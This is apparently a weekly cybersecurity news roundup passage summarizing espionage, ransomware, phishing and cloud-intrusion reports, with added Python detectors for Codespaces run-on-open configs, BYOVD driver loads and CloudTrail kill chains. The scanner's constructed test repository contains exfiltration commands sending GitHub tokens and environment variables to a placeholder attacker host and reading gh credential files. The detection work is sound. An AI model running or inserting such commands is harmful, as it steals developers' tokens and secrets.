This past week brought multiple subtle signals rather than one major headline, and together they show how cyber attacks are quietly changing shape. Researchers observed intrusions that began in mundane places: developer workflows, remote tools, cloud access, identity paths, and routine user actions. Individually unremarkable, these entry points are getting quieter even as the impact of the attacks that use them grows.
Furthermore, various discoveries highlight the industrialization of cyber attacks, with attackers utilizing shared infrastructure, repeatable playbooks, rented access, and affiliate-style ecosystems. Cyber operations are evolving into services rather than isolated campaigns.
This article consolidates these findings into concise updates, revealing the maturation of attack techniques, the widening exposure to vulnerabilities, and the emerging patterns behind the noise.
-
Expansion of Startup Espionage
APT36 (also tracked as Transparent Tribe), a threat actor aligned with Pakistan, has expanded its operations beyond government targets to India’s startup ecosystem. Using ISO files and malicious LNK shortcuts disguised as sensitive startup-related content, APT36 delivers Crimson RAT, enabling extensive surveillance, data theft, and system reconnaissance. The attack begins with a spear-phishing email carrying an ISO image; once the image is mounted, the shortcut inside it installs Crimson RAT disguised as an executable named Excel. While the expansion marks a shift in focus, the campaign remains aligned with Transparent Tribe’s long-standing interest in intelligence on the Indian government and defense sectors, which suggests that startup staff are targeted for their proximity to government, law enforcement, or security operations, according to Acronis.
-
Shared Cybercrime Infrastructure
ShadowSyndicate, a threat activity cluster, has been linked to two additional SSH markers (SSH host-key fingerprints) that tie numerous servers to the same cybercrime operator. The servers are used by threat clusters associated with Cl0p, BlackCat, Ryuk, Malsmoke, and Black Basta. Notably, the operator frequently moves servers between SSH clusters. ShadowSyndicate is known to employ toolkits such as Cobalt Strike, Metasploit, Havoc, Mythic, Sliver, AsyncRAT, MeshAgent, and Brute Ratel. Group-IB noted that the actor often reuses prior infrastructure and rotates SSH keys across servers; done carefully, this makes infrastructure hand-offs look like legitimate server transitions, which is why fingerprint-based tracking has to account for key rotation.
-
Expansion of Ransomware KEV
CISA has updated 59 entries added to its Known Exploited Vulnerabilities (KEV) catalog in 2025 to flag them as known to be used in ransomware campaigns. These include vulnerabilities in Microsoft (16 entries), Ivanti (6 entries), Fortinet (5 entries), Palo Alto Networks (3 entries), and Zimbra (3 entries). GreyNoise’s Glenn Thorpe advised organizations to reassess any KEV entry whose ransomware-use field has flipped from ‘Unknown’ to ‘Known,’ especially those that were deprioritized because they had no ransomware association at the time.
-
Espionage and DDoS Arrests
Polish authorities have apprehended a 60-year-old employee of the country’s defense ministry on suspicion of spying for a foreign intelligence agency. The individual, who worked in the Ministry of National Defense’s strategy and planning department, including on military modernization projects, is believed to have collaborated with Russian and Belarusian intelligence services. Additionally, Poland’s Central Bureau for Combating Cybercrime (CBZC) arrested a 20-year-old man for conducting distributed denial-of-service (DDoS) attacks on high-profile websites, including those of strategic importance. The suspect faces six charges and a potential five-year prison sentence.
-
RCE Vectors in Codespaces
Multiple attack vectors have been identified in GitHub Codespaces that enable remote code execution by merely opening a malicious repository or pull request. These vectors include: (1) .vscode/settings.json, which can inject PROMPT_COMMAND into the integrated terminal’s environment; (2) .devcontainer/devcontainer.json, whose postCreateCommand runs during container setup; and (3) .vscode/tasks.json, where a task with runOn set to folderOpen executes as soon as the folder opens. Because Codespaces honors these VS Code-integrated configuration files, an attacker can execute arbitrary commands, extract GitHub tokens and secrets, and use hidden APIs to reach premium Copilot models. Microsoft considers the behavior intended, but security researchers have raised concerns about the risk of opening untrusted repositories.
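A practical pre-flight check for the three vectors above is to scan a checked-out repository for configuration that runs commands on open, before launching a Codespace or opening the folder locally. The following is an added example written for this bulletin; it is not code from GitHub, Microsoft or the researchers. The file paths and key names follow public VS Code and devcontainer documentation (the full set of devcontainer lifecycle hooks is checked, not only postCreateCommand); the sample repository that demo() writes is constructed, and the attacker.example host in it is a placeholder.

```python
"""Flag repository files that make VS Code or Codespaces execute commands when
the folder is opened. Added example, not code from the original bulletin."""
import json
import re
import tempfile
from pathlib import Path

# settings.json: values under these keys become environment variables of the
# integrated terminal; PROMPT_COMMAND and the other names below cause code to run.
TERMINAL_ENV_KEYS = ("terminal.integrated.env.linux",
                     "terminal.integrated.env.osx",
                     "terminal.integrated.env.windows")
RISKY_ENV_VARS = {"PROMPT_COMMAND", "BASH_ENV", "ENV", "LD_PRELOAD", "PYTHONSTARTUP"}
# devcontainer.json lifecycle hooks executed by the container build/start pipeline.
DEVCONTAINER_HOOKS = ("initializeCommand", "onCreateCommand", "updateContentCommand",
                      "postCreateCommand", "postStartCommand", "postAttachCommand")

# VS Code config files are JSONC: keep strings verbatim, drop // and /* */ comments
# and trailing commas, then hand the result to json.loads().
_JSONC = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/|,(?=\s*[}\]])', re.S)


def load_jsonc(path: Path):
    if not path.is_file():
        return None
    text = _JSONC.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "",
                      path.read_text())
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        return None


def scan_repo(root: Path) -> list[str]:
    findings = []
    settings = load_jsonc(root / ".vscode" / "settings.json") or {}
    for key in TERMINAL_ENV_KEYS:
        env = settings.get(key)
        if isinstance(env, dict):
            for var, value in env.items():
                if var in RISKY_ENV_VARS:
                    findings.append(f".vscode/settings.json: {key}.{var}={value!r}")
    for rel in (".devcontainer/devcontainer.json", ".devcontainer.json"):
        dc = load_jsonc(root / rel) or {}
        for hook in DEVCONTAINER_HOOKS:
            if hook in dc:
                findings.append(f"{rel}: {hook}={dc[hook]!r}")
    tasks = load_jsonc(root / ".vscode" / "tasks.json") or {}
    for task in tasks.get("tasks", []):
        if isinstance(task, dict) and (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            findings.append(f".vscode/tasks.json: task {task.get('label')!r} "
                            f"runs on folderOpen: {task.get('command')!r}")
    return findings


# Constructed malicious repository exercising all three vectors (placeholder host).
SAMPLE_REPO = {
    ".vscode/settings.json": """{
  // looks like harmless terminal customisation
  "terminal.integrated.env.linux": {
    "PROMPT_COMMAND": "curl -s https://attacker.example/p?t=$GITHUB_TOKEN >/dev/null",
  },
}""",
    ".devcontainer/devcontainer.json": """{
  "image": "mcr.microsoft.com/devcontainers/base:ubuntu",
  "postCreateCommand": "env | curl -s -X POST --data-binary @- https://attacker.example/env"
}""",
    ".vscode/tasks.json": """{
  "version": "2.0.0",
  "tasks": [{
    "label": "build",
    "type": "shell",
    "command": "cat ~/.config/gh/hosts.yml | base64",
    "runOptions": { "runOn": "folderOpen" }
  }]
}""",
}


def demo() -> list[str]:
    """Write the constructed repo to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in SAMPLE_REPO.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        return scan_repo(root)


if __name__ == "__main__":
    for finding in demo():
        print("FINDING", finding)
```

The scanner is a triage aid, not a guarantee: a finding means the repository will run something on open, and the command should be read before the folder is trusted. Run it from a clean checkout (for example in CI on incoming pull requests) so the files it reads are the ones that would be honored, not a local copy that has already been opened.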
-
Targeting Nordic Finance
The Lazarus Group, linked to North Korea, has been targeting the financial sector in the Nordic region through a campaign named Contagious Interview. The campaign deploys a stealer and downloader named BeaverTail, which searches the victim’s machine for cryptocurrency-related data and also serves as a remote access tool for follow-on activity. TRUESEC highlighted that BeaverTail can automatically gather sensitive information while providing a pathway for additional attacks.
-
Volunteer DDoS Force
SOCRadar’s analysis revealed that the pro-Russian hacktivist group NoName057(16) is utilizing a volunteer-distributed DDoS weapon called DDoSia Project to disrupt government, media, and institutional websites associated with Ukraine and Western political interests. With active Telegram channels boasting over 20,000 followers, the group presents these disruptive but non-destructive attacks as self-defense against Western aggression. By offering real-time evidence of successful disruptions, the group aims to counter sanctions and military aid announcements through retaliatory cyber attacks. The DDoSia Project recruits participants through propaganda, gamification, and cryptocurrency rewards, building a distributed attack force with minimal technical requirements but high operational sophistication, primarily targeting Ukraine, European allies, and NATO states across various sectors.
-
Affiliate Crypto Drainers
The Rublevka Team, a significant cybercriminal operation specializing in large-scale cryptocurrency theft since 2023, has generated over $10 million through affiliate-driven wallet draining campaigns. Acting as a ‘traffer team,’ Rublevka Team comprises a network of social engineering specialists directing victim traffic to malicious pages. Unlike traditional malware-based approaches, Rublevka Team employs custom JavaScript scripts via spoofed landing pages mimicking legitimate crypto services to trick victims into authorizing fraudulent transactions. Affiliates of Rublevka Team gain access to Telegram bots, landing page generators, evasion features, and support for over 90 wallet types, facilitating high-volume scams with minimal oversight. The group’s Telegram channel has amassed approximately 7,000 members to date.
-
TLS Deprecation Deadline
Microsoft has issued an advisory urging customers to migrate to Transport Layer Security (TLS) version 1.2 for Azure Blob Storage. The company plans to discontinue support for TLS versions 1.0 and 1.1 on February 3, 2026. The change affects all existing and new blob storage accounts that still accept TLS 1.0 or 1.1, across all cloud environments; accounts already limited to TLS 1.2 are not affected. Accounts can enforce this ahead of the deadline by raising the storage account’s minimum TLS version setting to 1.2, which surfaces any legacy clients now rather than on the cutover date.
-
Voicemail Social Engineering
A recent campaign has surfaced involving fake voicemail messages sent from bank-themed subdomains that redirect recipients to a deceptive “listen to your message” page. The lure leads to the installation of Remotely RMM, a legitimate remote access tool, which enrolls the victim’s system into an attacker-controlled environment and grants remote access and management capabilities. No exploit is involved: the threat actors rely on social engineering to persuade users to approve each installation step themselves.
-
Global Proxy Botnet
SystemBC, a long-standing malware operation also known as Coroxy or DroxiDat, has infected over 10,000 IP addresses globally, including systems associated with sensitive government infrastructure in Burkina Faso and Vietnam. The highest concentration of infected IP addresses is observed in the U.S., followed by Germany, France, Singapore, and India. SystemBC is commonly used to proxy traffic through compromised systems, maintain persistent access to internal networks, or deploy additional malware. The associated infrastructure poses a sustained risk due to its early involvement in intrusion chains and its use by multiple threat actors. Vigilant monitoring is crucial as SystemBC activity often precedes ransomware deployment and other malicious activities.
-
Initial Access via Screensaver
A new spear-phishing campaign employing business-themed lures has been observed using Windows screensaver files (.SCR) to discreetly install legitimate remote monitoring and management (RMM) tools like SimpleHelp. By hiding the attack inside trusted services, the delivery chain evades reputation-based defenses and complicates takedown and containment. SCR files are ordinary PE executables under a different extension, so they run when a user double-clicks them while slipping past controls written only for EXE and MSI files; attackers rely on users’ willingness to download and run them to trigger code execution.
-
Abuse of Legitimate Driver for Escalation
Threat actors are leveraging a legitimate but revoked Guidance Software (EnCase) kernel driver in a bring your own vulnerable driver (BYOVD) attack to escalate privileges and circumvent security tools. In a recent incident, attackers compromised SonicWall SSL-VPN credentials to gain initial access to a network and deployed an EDR-killer tool that abused the EnCase driver (“EnPortv.sys”) to terminate security processes from kernel mode. Although the attack was disrupted before ransomware deployment, it highlights a concerning trend of threat actors weaponizing signed, legitimate drivers to bypass endpoint security; because the kernel does not consult certificate revocation when loading a driver, revocation alone does not stop the abuse.
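Driver loads are the right place to catch BYOVD, and Sysmon’s DriverLoad record (Event ID 6) carries what is needed: image path, hashes, signer and signature status. The block below is an added example for this bulletin, not code from the incident report it summarizes. The three XML records are constructed; the driver file name EnPortv.sys comes from the text, while the signer string, paths and SHA-256 values are placeholders, and the block-list set is left for the reader to populate from Microsoft’s recommended driver block rules.

```python
"""Triage Sysmon DriverLoad (Event ID 6) records for BYOVD indicators.
Added example; events are constructed and hashes are placeholders."""
import xml.etree.ElementTree as ET

WATCHLIST = {"enportv.sys"}  # driver name from the text; extend as needed
BLOCKED_SHA256 = {"ab" * 32}  # placeholder; fill from Microsoft's driver block rules
# Kernel drivers normally live under these directories; a load from anywhere
# else (ProgramData, Users, Temp) is suspicious regardless of signature.
SAFE_DIRS = ("c:\\windows\\system32\\drivers\\", "c:\\windows\\system32\\driverstore\\")


def event(image, signed, signature, status, sha256):
    """Build a minimal Sysmon Event ID 6 record in Windows Event XML (constructed)."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>6</EventID><Channel>Microsoft-Windows-Sysmon/Operational</Channel></System>
  <EventData>
    <Data Name="ImageLoaded">{image}</Data>
    <Data Name="Hashes">SHA256={sha256}</Data>
    <Data Name="Signed">{signed}</Data>
    <Data Name="Signature">{signature}</Data>
    <Data Name="SignatureStatus">{status}</Data>
  </EventData>
</Event>"""


EVENTS = [
    # 1. benign Microsoft driver from the expected directory
    event("C:\\Windows\\System32\\drivers\\tcpip.sys", "true", "Microsoft Windows",
          "Valid", "11" * 32),
    # 2. the EnCase driver dropped by an EDR killer: still signed, status looks fine,
    #    but the name is on the watchlist and the path is wrong
    event("C:\\ProgramData\\Pkg\\EnPortv.sys", "true", "Guidance Software (placeholder)",
          "Valid", "22" * 32),
    # 3. unsigned driver from a user-writable path whose hash is on the block list
    event("C:\\Users\\Public\\Libraries\\hw.sys", "false", "", "Unavailable", "ab" * 32),
]


def parse(xml_text):
    root = ET.fromstring(xml_text)
    event_id = root.findtext("{*}System/{*}EventID")
    data = {d.get("Name"): (d.text or "") for d in root.iterfind(".//{*}Data")}
    return event_id, data


def hashes(field):
    """'SHA256=...,MD5=...' -> {'SHA256': '...', 'MD5': '...'}"""
    return dict(part.split("=", 1) for part in field.split(",") if "=" in part)


def assess(xml_text):
    """Return (image, reasons) for an Event ID 6 record, or None for other events."""
    event_id, d = parse(xml_text)
    if event_id != "6":
        return None
    image = d.get("ImageLoaded", "")
    name = image.rsplit("\\", 1)[-1].lower()
    reasons = []
    if name in WATCHLIST:
        reasons.append("known-abused driver name")
    if hashes(d.get("Hashes", "")).get("SHA256", "").lower() in BLOCKED_SHA256:
        reasons.append("hash on block list")
    if not image.lower().startswith(SAFE_DIRS):
        reasons.append("loaded from non-standard path")
    if d.get("Signed", "").lower() != "true" or d.get("SignatureStatus") != "Valid":
        reasons.append(f"signature status {d.get('SignatureStatus')!r}")
    return image, reasons


def triage(events):
    """Flagged (image, reasons) pairs, in event order."""
    flagged = []
    for xml_text in events:
        result = assess(xml_text)
        if result and result[1]:
            flagged.append(result)
    return flagged


if __name__ == "__main__":
    for image, reasons in triage(EVENTS):
        print(image, "->", "; ".join(reasons))
```

Note what the second record shows: the EnCase driver is flagged only by its name and load path, not by its signature, because a valid-looking signature status is exactly what makes BYOVD work. Detection like this is a backstop; the primary control is enforcing Microsoft’s vulnerable driver blocklist (via HVCI or a WDAC policy) so the driver never loads.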
-
Crypto Bug in Ransomware
Security researchers have identified a coding error in the Nitrogen ransomware that encrypts files with an incorrect public key, rendering them irrecoverable. Victims without viable backups cannot recover their encrypted ESXi servers even if they pay the ransom. Coveware emphasized that paying will not help these victims, because the decryption key or tool the attackers supply does not match the key the files were actually encrypted with.
-
AI Cloud Escalation
An offensive cloud operation targeting an Amazon Web Services (AWS) environment achieved administrative privileges within eight minutes, using large language models (LLMs) to automate reconnaissance, generate malicious code, and make real-time decisions. The threat actor gained initial access with credentials discovered in public Simple Storage Service (S3) buckets, rapidly escalated privileges through Lambda function code injection, traversed 19 unique AWS principals, used Amazon Bedrock for LLMjacking, and deployed GPU instances for model training. Sysdig attributed the speed of the intrusion to the LLM-driven orchestration of each step.
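Each step of that chain leaves a CloudTrail record, so the useful exercise is to correlate them: credential material read from S3, Lambda code changes, role chaining, Bedrock calls, GPU launches and IAM policy attachments, plus a count of distinct principals and the elapsed time. The block below is an added example written for this bulletin, not code from Sysdig or from the report. The events are constructed and simplified (the account ID, names, ARNs and model ID are placeholders; the anonymous S3 read is reduced to the fields the code uses), but the field names follow the CloudTrail record format.

```python
"""Correlate a CloudTrail event stream into the stages of the AWS kill chain
described above. Added example; EVENTS is constructed and simplified."""
import re
from datetime import datetime

SENSITIVE_KEY = re.compile(r"(\.env$|credentials|\.pem$|secret|token)", re.I)
GPU_PREFIXES = ("p2", "p3", "p4", "p5", "g4", "g5", "g6", "trn1")
ADMIN_POLICIES = {"arn:aws:iam::aws:policy/AdministratorAccess"}


def principal(identity: dict) -> str:
    """Collapse an STS session ARN onto the role it came from, so one role
    reached through many sessions counts once; anonymous callers have no ARN."""
    arn = identity.get("arn")
    if not arn:
        return f"{identity.get('type')}:{identity.get('accountId')}"
    m = re.match(r"arn:aws:sts::(\d+):assumed-role/([^/]+)/", arn)
    return f"arn:aws:iam::{m.group(1)}:role/{m.group(2)}" if m else arn


def classify(ev: dict):
    """Map one record to a kill-chain stage name, or None if it is uninteresting."""
    name, src = ev["eventName"], ev["eventSource"]
    p = ev.get("requestParameters") or {}
    actor = ev["userIdentity"].get("arn", "")
    if src == "s3.amazonaws.com" and name == "GetObject" and SENSITIVE_KEY.search(p.get("key", "")):
        return "s3_credential_read"
    if src == "lambda.amazonaws.com" and name in ("UpdateFunctionCode", "UpdateFunctionConfiguration"):
        return "lambda_code_injection"
    if src == "sts.amazonaws.com" and name == "AssumeRole" and actor.startswith("arn:aws:sts::"):
        return "role_chaining"  # a session assuming yet another role
    if src == "bedrock.amazonaws.com" and name.startswith("InvokeModel"):
        return "bedrock_use"
    if src == "ec2.amazonaws.com" and name == "RunInstances" and p.get("instanceType", "").startswith(GPU_PREFIXES):
        return "gpu_instance_launch"
    if src == "iam.amazonaws.com" and name in ("AttachUserPolicy", "AttachRolePolicy") and p.get("policyArn") in ADMIN_POLICIES:
        return "iam_escalation"
    return None


def triage(events: list) -> dict:
    events = sorted(events, key=lambda e: e["eventTime"])
    principals, stages = set(), []
    for ev in events:
        principals.add(principal(ev["userIdentity"]))
        if ev["eventName"] == "AssumeRole":
            principals.add(ev["requestParameters"]["roleArn"])
        stage = classify(ev)
        if stage and stage not in stages:
            stages.append(stage)
    first, last = (datetime.fromisoformat(e["eventTime"].replace("Z", "+00:00"))
                   for e in (events[0], events[-1]))
    return {"principals": len(principals), "stages": stages,
            "minutes": (last - first).total_seconds() / 60}


# ---- constructed sample stream (placeholders throughout) ----
ACCT = "111122223333"
USER = f"arn:aws:iam::{ACCT}:user/ci-bot"
ROLE_A = f"arn:aws:iam::{ACCT}:role/report-exec"
ROLE_B = f"arn:aws:iam::{ACCT}:role/platform-admin"
SESS_A = f"arn:aws:sts::{ACCT}:assumed-role/report-exec/nightly-report"
SESS_B = f"arn:aws:sts::{ACCT}:assumed-role/platform-admin/s1"


def ev(time, source, name, identity, params):
    if isinstance(identity, str):
        identity = {"arn": identity}
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "userIdentity": identity, "requestParameters": params}


EVENTS = [
    ev("2025-01-15T10:00:00Z", "s3.amazonaws.com", "GetObject",
       {"type": "AWSAccount", "accountId": "anonymous"},        # public bucket read
       {"bucketName": "public-site-assets", "key": "backup/.env"}),
    ev("2025-01-15T10:01:30Z", "lambda.amazonaws.com", "UpdateFunctionCode", USER,
       {"functionName": "nightly-report"}),
    ev("2025-01-15T10:02:00Z", "sts.amazonaws.com", "AssumeRole", USER, {"roleArn": ROLE_A}),
    ev("2025-01-15T10:03:00Z", "sts.amazonaws.com", "AssumeRole", SESS_A, {"roleArn": ROLE_B}),
    ev("2025-01-15T10:05:00Z", "bedrock.amazonaws.com", "InvokeModel", SESS_B,
       {"modelId": "example-model-id"}),
    ev("2025-01-15T10:07:30Z", "ec2.amazonaws.com", "RunInstances", SESS_B,
       {"instanceType": "p4d.24xlarge"}),
    ev("2025-01-15T10:08:00Z", "iam.amazonaws.com", "AttachUserPolicy", SESS_B,
       {"userName": "ci-bot", "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}),
]

if __name__ == "__main__":
    print(triage(EVENTS))
```

Two design points carry over to real data: session ARNs must be normalised onto their role before counting principals, otherwise every AssumeRole inflates the count, and S3 GetObject records only appear if data events are enabled on the bucket, so the first stage is invisible unless data-event logging is on.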
-
Cloud Phishing Chain
A phishing scheme has emerged that uses procurement and tender-themed emails to distribute PDF attachments that start a multi-stage attack chain. The goal is to steal users’ Dropbox credentials, which are sent to a Telegram bot. After the data is transmitted, the page simulates a login attempt with a 5-second delay and then shows an “Invalid email or password” error, giving the victim no reason to suspect the theft. The PDF is hosted on legitimate cloud infrastructure (Vercel Blob storage) and redirects to a Dropbox impersonation page, so the campaign borrows the trust of both services to harvest credentials.
-
Sandbox Escape Flaw
A critical security flaw (CVE-2025-64721, CVSS score: 9.9) has been disclosed in Sandboxie that lets sandboxed processes execute arbitrary code as SYSTEM, fully compromising the host. The vulnerability stems from the “SboxSvc.exe” service, which runs with SYSTEM privileges and brokers access between sandboxed processes and real system resources. The flaw has been fixed in version 1.16.7.
-
Exposed AsyncRAT Infrastructure
Censys has identified 57 active AsyncRAT-associated hosts exposed on the public internet as of January 2026. AsyncRAT, introduced in 2019, facilitates unauthorized access and post-compromise control, making it a preferred tool for credential theft, lateral movement, and subsequent malicious activities. The majority of these assets are hosted on APIVERSA (13% of hosts), Contabo networks (11% combined), and AS-COLOCROSSING (5.5%), indicating a preference for low-cost, abuse-tolerant hosting over major cloud providers. The distinctive self-signed TLS certificate identifying the service as an ‘AsyncRAT Server’ enables scalable discovery of related infrastructure beyond sample-based detection.
-
Typhoon Tradecraft Overlap
Analysis of campaigns by Chinese hacking groups Violet Typhoon and Volt Typhoon unveiled common tactics such as zero-day exploits in edge devices, living-off-the-land (LotL) techniques, and Operational Relay Box (ORB)

